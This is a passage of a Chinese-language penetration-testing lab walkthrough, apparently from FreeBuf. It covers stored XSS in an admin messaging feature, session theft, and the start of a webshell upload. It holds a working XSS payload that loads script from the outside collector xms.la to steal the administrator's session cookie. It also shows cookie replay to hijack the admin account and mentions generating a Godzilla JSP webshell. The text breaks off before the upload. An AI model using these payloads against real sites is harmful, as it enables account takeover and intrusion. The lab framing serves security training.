一、靶场条件:
- 已知DMZ区web网站http://171.16.57.110/(端口号80)
- 已注册用户test
二、通过xss接管管理页面
- 使用注册用户test登录http://171.16.57.110/,登陆后为普通会员,且login登录后返回sessionid
- 点击【联系管理员】,可以给管理员发站内邮件
- 点击【给管理员发私信】
- 标题内容输入xss语句进行探测是否可以执行<img src=! onerror='alert(/xss/)'>
- 提交后,点击该标题,可以看到脚本被执行,证明存在xss
- 知道此处存在xss,现在进行session的获取,按步骤4,在标题和内容输入如下脚本(可注册海鸥系统http://xms.la/,自行配置xss项目,并生成xss代码),保存并提交:<img src=x
onerror=with(document)body.appendChild(document.createElement('script')).src="//xms.la/VTIT4">
- 此时系统管理员登录http://171.16.57.110/,点击【我的消息】,并点击查看留言
- 成功触发xss
- 攻击者登录海鸥系统(http://xms.la/),成功得到session:2f74f6c4657b4dbf800dd3e6cfd897ee
- 攻击者得到sessionid后,浏览器登录http://171.16.57.110/index,使用cookie editor插件修改浏览器会话信息,添加请求头cookie信息sessionID=026a7ea6d73f4e718623fa7027d03ea5
- 然后重新刷新http://171.16.57.110/index,发现已成功接管管理员账号
- 点击【会员管理】,升级test用户为管理员
- 扫描端口得知171.16.57.110存在7000端口
- 直接访问提示spring报错
- 进行目录扫描得到http://171.16.57.110:7000/admin/login,访问后得到后台管理页面
- 点击登录,尝试用演示论坛的test用户登录,登录成功
三、上传漏洞getshell
- 打开哥斯拉,生成jsp一句话木马文件muma.jsp
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022